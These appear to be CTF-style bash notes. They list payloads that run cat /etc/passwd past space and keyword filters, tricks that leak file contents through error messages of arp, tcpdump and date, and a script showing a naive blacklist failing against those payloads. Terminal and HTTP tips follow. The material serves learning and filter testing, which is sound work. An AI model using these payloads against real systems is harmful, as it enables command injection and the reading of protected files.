bash-tricks
Space not allowed
Different ways to run the command cat /etc/passwd without typing a space (useful when a filter strips or rejects 0x20):
$ {cat,/etc/passwd}                # brace expansion produces: cat /etc/passwd
$ cat${IFS}/etc/passwd             # IFS defaults to space, tab, newline; the expanded text is word-split on it
$ cat${IFS:0:1}/etc/passwd         # only the first IFS character (a single space)
$ cat$IFS/etc/passwd               # no braces needed: '/' cannot be part of a variable name, so $IFS ends there
$ cat</etc/passwd>/tmp/outt        # no argument at all: stdin from the file, stdout to /tmp/outt
$ IFS=:;cat$IFS/etc/passwd         # IFS is now ':'; "cat:/etc/passwd" is split on ':' into cat and /etc/passwd
$ cat$IFS$9${PWD%%[a-z]*}e*c${PWD%%[a-z]*}p?ss?? # this is cat /etc/passwd: $9 is an empty positional parameter, ${PWD%%[a-z]*} is "/" whenever PWD starts with a lowercase directory (/ctf, /tmp, /home/...), and /e*c/p?ss?? globs to /etc/passwd
Bypass tricks
$ cat$(printf '\x20/etc/passwd')   # no literal space: bash's builtin printf turns \x20 into one, and the substitution's output is word-split
$ C=cat; $C /etc/passwd            # hide the command name in a variable
$ curl site.com/{1.php,2.php}      # one command, two requests: bash brace expansion (and curl's own {} globbing) expand it to both URLs
Globs and brace expansion also let you reach a path without typing it literally:
root@cb7435cd5cf3:/ctf# ls /root
angr bin ...
root@cb7435cd5cf3:/ctf# ls /roo*
angr bin ...
root@cb7435cd5cf3:/ctf# ls /roo?
angr bin ...
root@cb7435cd5cf3:/ctf# ls /roo[a-z]
angr bin ...
root@cb7435cd5cf3:/ctf# ls /roo{x,t}
ls: cannot access '/roox': No such file or directory
/root:
angr bin
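The following script is an added example, not part of the original notes. It models a hypothetical blacklist filter that rejects any payload containing a space or the string "passwd" (the kind of check a web app might bolt onto a system() call), then pushes the space-free and glob payloads from the lists above through it. The target is a constructed temp file standing in for /etc/passwd, so the script runs anywhere; each surviving payload is executed with bash -c, exactly as the vulnerable program would run it.

```shell
#!/bin/sh
# Added example: naive space/"passwd" blacklist versus the ${IFS}, brace,
# glob and redirection payloads listed above. Not from the original page.
set -u

# Constructed stand-in for /etc/passwd, alone in a private directory so
# the globs below can match only this one file.
TDIR="$(mktemp -d)"
TARGET="$TDIR/passwd"
printf 'root:x:0:0:root:/root:/bin/bash\n' > "$TARGET"
trap 'rm -rf "$TDIR"' EXIT

# Hypothetical filter: reject a literal space (0x20) or the word passwd.
filter_allows() {
    case "$1" in
        *' '*|*passwd*) return 1 ;;   # blocked
        *)              return 0 ;;   # allowed
    esac
}

# Pass a payload through the filter; if it survives, run it the way a
# vulnerable program would: bash -c "$payload".
run_payload() {
    if filter_allows "$1"; then
        bash -c "$1" 2>/dev/null
    else
        echo BLOCKED
    fi
}

# Payloads built like the list above. Single quotes keep the $ signs
# literal here; they are expanded only inside bash -c.
payload_plain="cat $TARGET"                     # space and "passwd": blocked
payload_ifs='cat${IFS}'"$TDIR"'/p?ss??'         # ${IFS} plus a glob for the name
payload_slice='cat${IFS:0:1}'"$TDIR"'/pass*'    # first IFS char plus a glob
payload_brace="{cat,$TDIR/p?ss??}"              # brace expansion supplies the space
payload_redirect="cat<$TDIR/p[a-z]ss??"         # no argument: stdin redirection (bash globs the target)

# Show what the filter lets through and what each payload actually does.
for p in "$payload_plain" "$payload_ifs" "$payload_slice" \
         "$payload_brace" "$payload_redirect"; do
    printf '%-48s -> %s\n' "$p" "$(run_payload "$p")"
done
```

Every payload except the plain one prints the file's contents: a blacklist on one character (or one string) is not a boundary, because the shell rebuilds the argument after the filter has already approved the text.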
The mysterious ^D (Ctrl + D)
Like ^C, ^D is used to get out of a program, but the two work differently. ^D sends no signal at all: it makes the terminal driver hand whatever has been typed on the current line to the program, so at the start of an empty line read() returns 0 and the program sees EOF on standard input. ^C makes the terminal driver send SIGINT to the foreground process group, which kills the program unless it handles the signal.
Run perl with its program read from standard input (perl -) and see it in action:
root@fc7e34d51219:/ctf# perl -
print(23);
print("hello??");
print("hmmm");
Press ^C and perl is killed by SIGINT before it has run anything. Press ^D and perl receives EOF, treats it as the end of its program, compiles it and runs all three prints. It is not only perl: any utility that reads its whole input before acting (python -, sort, wc, ...) behaves the same way.
Read a local file with other commands
Each of these makes a tool open the file for some other purpose and then echo its lines back, usually in error messages, so the content is recovered from stderr:
arp -v -f '/etc/passwd'                 # -f reads address entries from the file; the verbose error output reveals its content
tcpdump -c 1 -vvvvvv -V '/etc/passwd'   # -V treats every line as the name of a capture file to read; each "No such file" error echoes the line
date '+%s' -f '/etc/passwd'             # -f reads one date per line; every unparsable line is reported verbatim
od /etc/passwd                          # plain octal dump of the file; od -c is easier to read
Useful Commands
HTOP
htop can attach strace to a running process and show its system calls (top has no such feature). strace must be installed, and you need permission to ptrace the target: root, or your own process subject to the kernel's ptrace restrictions. Steps:
Run htop
Navigate to the process you want
Press 's'. htop runs strace on that process and shows its system calls live
Connect to server manually
HTTP : nc IP PORT
HTTPS : openssl s_client -connect site.com:443 -servername site.com   # -servername sends SNI; without it many virtual hosts present the wrong certificate or refuse the request
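An added example, not part of the original notes: the two connections above with the request built by a helper, so the details that usually break a hand-typed request are handled once: CRLF line endings, a Host header, a blank line ending the headers, and SNI for TLS. site.com, the port and the path are placeholders.

```shell
#!/bin/sh
# Added example: hand-built HTTP request over nc or openssl s_client.

# Build a minimal HTTP/1.1 request: $1 = host, $2 = path.
# printf emits real CR LF pairs; the final empty line ends the headers.
http_request() {
    printf 'GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' "$2" "$1"
}

# Plain HTTP over nc: $1 = host, $2 = port, $3 = path.
http_send() {
    http_request "$1" "$3" | nc "$1" "$2"
}

# HTTPS over openssl s_client: $1 = host, $2 = port, $3 = path.
# -servername sends SNI so a virtual host presents the right certificate;
# -quiet hides the handshake/certificate output and keeps the connection
# open until the server closes it, which Connection: close makes it do.
https_send() {
    http_request "$1" "$3" \
        | openssl s_client -quiet -connect "$1:$2" -servername "$1" 2>/dev/null
}

# Self-check: number of CRs in the request; a well-formed request with
# two headers has exactly four (request line, two headers, blank line).
crlf_count() {
    http_request "$1" "$2" | tr -cd '\r' | wc -c | tr -d ' '
}

# Usage (network calls, run by hand):
#   http_send site.com 80 /
#   https_send site.com 443 /
http_request site.com /
```

When a server answers a hand-typed request with 400 Bad Request, the cause is almost always a missing Host header or bare LF line endings, which the helper rules out.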